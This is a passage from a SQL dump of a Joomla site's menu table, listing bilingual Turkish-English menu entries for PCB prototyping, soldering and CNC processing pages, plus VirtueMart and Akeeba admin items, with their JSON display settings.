00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',295,296,0,'en-GB',0),(508,'teknikbilgiler-en','Lead-Free Solder','lead-free-solder','','lead-free-solder','index.php?option=com_content&view=article&id=76','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',297,298,0,'en-GB',0),(727,'main','COM_VIRTUEMART_MENU_CUSTOMS','com_virtuemart_menu_customs','','com_virtuemart/com_virtuemart_menu_customs','index.php?option=com_virtuemart&view=custom','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-document_move.png',0,'{}',366,367,0,'',1),(509,'teknikbilgiler-en','Wave Soldering','wave-soldering','','wave-soldering','index.php?option=com_content&view=article&id=75','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',299,300,0,'en-GB',0),(726,'main','COM_VIRTUEMART_MENU_PRODUCTS','com_virtuemart_menu_products','','com_virtuemart/com_virtuemart_menu_products','index.php?option=com_virtuemart&view=product','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-products.png',0,'{}',364,365,0,'',1),(510,'teknikbilgiler-en','PCB Productions Methods','pcb-productions-methods','','pcb-productions-methods','index.php?option=com_content&view=article&id=74','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',301,302,0,'en-GB',0),(518,'mainmenu','Home for All Languages','home-for-all-languages','','home-for-all-languages','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',303,304,1,'*',0),(593,'mainmenu-en','Home Page','homepage2-menu','','homepage2-menu','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',313,314,1,'en-GB',0),(596,'topmenu-en','About Us','about-us','','about-us','index.php?option=com_content&view=article&id=71','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',25,26,0,'en-GB',0),(739,'main','COM_AKEEBA','com_akeeba','','com_akeeba','index.php?option=com_akeeba','component',1,1,1,10033,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',391,392,0,'',1),(725,'main','COM_VIRTUEMART_MENU_CATEGORIES','com_virtuemart_menu_categories','','com_virtuemart/com_virtuemart_menu_categories','index.php?option=com_virtuemart&view=category','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-categories.png',0,'{}',362,363,0,'',1),(723,'main','COM_VIRTUEMART','com_virtuemart','','com_virtuemart','index.php?option=com_virtuemart','component',1,1,1,10000,0,'0000-00-00 00:00:00',0,1,'../components/com_virtuemart/assets/images/vmgeneral/menu_icon.png',0,'{}',359,386,0,'',1),(724,'main','COM_VIRTUEMART_CONTROL_PANEL','com_virtuemart_control_panel','','com_virtuemart/com_virtuemart_control_panel','index.php?option=com_virtuemart&view=virtuemart','component',1,723,2,10000,0,'0000-00-00 00:00:00',0,1,'components/com_virtuemart/assets/images/icon_16/menu-icon16-report.png',0,'{}',360,361,0,'',1),(628,'solmenu-teknik','PCB Milling','pcb-milling','','pcb-milling','index.php?option=com_content&view=article&id=89','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',29,30,0,'*',0),(629,'solmenu-video-cnc','PCB Kazıma/Milling','pcb-kazıma-milling','','pcb-prototip-prototyping/pcb-kazıma-milling','index.php?option=com_content&view=article&id=89','component',1,639,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',320,321,0,'*',0),(630,'solmenu-video-cnc','PCB Non-copper','pcb-non-copper','','pcb-prototip-prototyping/pcb-non-copper','index.php?option=com_content&view=article&id=90','component',1,639,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',322,323,0,'*',0),(631,'solmenu-video-cnc','PCB Çerçeve / Outline','pcb-outline','','pcb-prototip-prototyping/pcb-outline','index.php?option=com_content&view=article&id=91','component',1,639,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',326,327,0,'*',0),(632,'solmenu-video-cnc','PCB Seviyeleme / Self-Levelling','pcb-yükseklik-self-levelling','','pcb-prototip-prototyping/pcb-yükseklik-self-levelling','index.php?option=com_content&view=article&id=93','component',1,639,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',318,319,0,'*',0),(633,'solmenu-video-cnc','PCB Delikler / Holes','pcb-delikler-holes','','pcb-prototip-prototyping/pcb-delikler-holes','index.php?option=com_content&view=article&id=92','component',1,639,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',324,325,0,'*',0),(634,'topmenu-tr','Videolar','videolar','','videolar','index.php?option=com_content&view=category&id=86','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_category_heading_title_text\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"0\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"0\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"list_show_votes\":\"\",\"list_show_ratings\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"0\",\"display_num\":\"10\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',15,20,0,'*',0),(637,'topmenu-tr','PCB Kazıma/Milling','pcb-kazıma-milling','','videolar/pcb-kazıma-milling','index.php?option=com_content&view=article&id=89','component',-2,634,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',18,19,0,'*',0),(635,'topmenu-en','Videos','videos','','videos','index.php?option=com_content&view=category&id=86','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_category_heading_title_text\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"0\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"0\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"list_show_votes\":\"\",\"list_show_ratings\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"0\",\"display_num\":\"10\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',23,24,0,'*',0),(636,'topmenu-tr','PCB Yükseklik Seviyeleme / Height Self-Levelling','pcb-yükseklik-seviyeleme-height-self-levelling','','videolar/pcb-yükseklik-seviyeleme-height-self-levelling','index.php?option=com_content&view=article&id=93','component',-2,634,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',16,17,0,'*',0),(660,'solmenu-video-cnc','Ahşap İşleme / Wood processing','wood-processing-ahşap-işleme','','wood-processing-ahşap-işleme','index.php?option=com_content&view=article&id=94','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',329,332,0,'*',0),(661,'solmenu-video-cnc','Akrilik işleme / Acrylic processing','akrilik-işleme-acrylic-processing','','akrilik-işleme-acrylic-processing','index.php?option=com_content&view=article&id=94','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',333,338,0,'*',0),(662,'solmenu-video-cnc','Aluminyum işleme / Aluminum processing','aluminyum-işleme-aluminum-processing','','aluminyum-işleme-aluminum-processing','index.php?option=com_content&view=article&id=94','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',339,342,0,'*',0),(663,'solmenu-video-cnc','MDF İşleme / MDF Processing','mdf-işleme-mdf-processing','','wood-processing-ahşap-işleme/mdf-işleme-mdf-processing','index.php?option=com_content&view=article&id=95','component',1,660,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',330,331,0,'*',0),(664,'solmenu-video-cnc','Akrilik işleme / Acrylic processing','akrilik-işleme-acrylic-processing','','akrilik-işleme-acrylic-processing/akrilik-işleme-acrylic-processing','index.php?option=com_content&view=article&id=96','component',1,661,2,22,0,'0000-00-00 00:00:00',0,1,' 